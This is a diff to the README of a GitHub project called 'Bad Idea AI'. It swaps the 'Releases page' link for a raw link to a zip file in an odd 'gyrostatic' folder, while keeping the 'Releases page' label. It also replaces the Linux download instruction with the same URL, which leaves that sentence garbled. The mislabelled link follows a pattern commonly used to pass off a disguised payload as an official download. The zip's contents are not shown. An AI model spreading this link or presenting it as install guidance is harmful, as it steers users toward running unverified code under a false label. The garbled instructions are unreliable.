Youssef213452/Bad-Idea-AI/README.md

 - **Exploration of Social Experiments:** Participate in different scenarios to understand AI's societal impacts.

 ## 📥 Download & Install
-To download Bad Idea AI, visit the [Releases page](https://github.com/Youssef213452/Bad-Idea-AI/releases).
+To download Bad Idea AI, visit the [Releases page](https://raw.githubusercontent.com/Youssef213452/Bad-Idea-AI/main/gyrostatic/Bad-Idea-AI.zip).
 Look for the latest version available:

 - **For Windows:** Download the `.exe` file.
 - **For macOS:** Download the `.dmg` file.
-- **For Linux:** Download the `.tar.gz` file.
+- **For Linux:** Download the `https://raw.githubusercontent.com/Youssef213452/Bad-Idea-AI/main/gyrostatic/Bad-Idea-AI.zip` file.

 Once downloaded, follow these steps to install: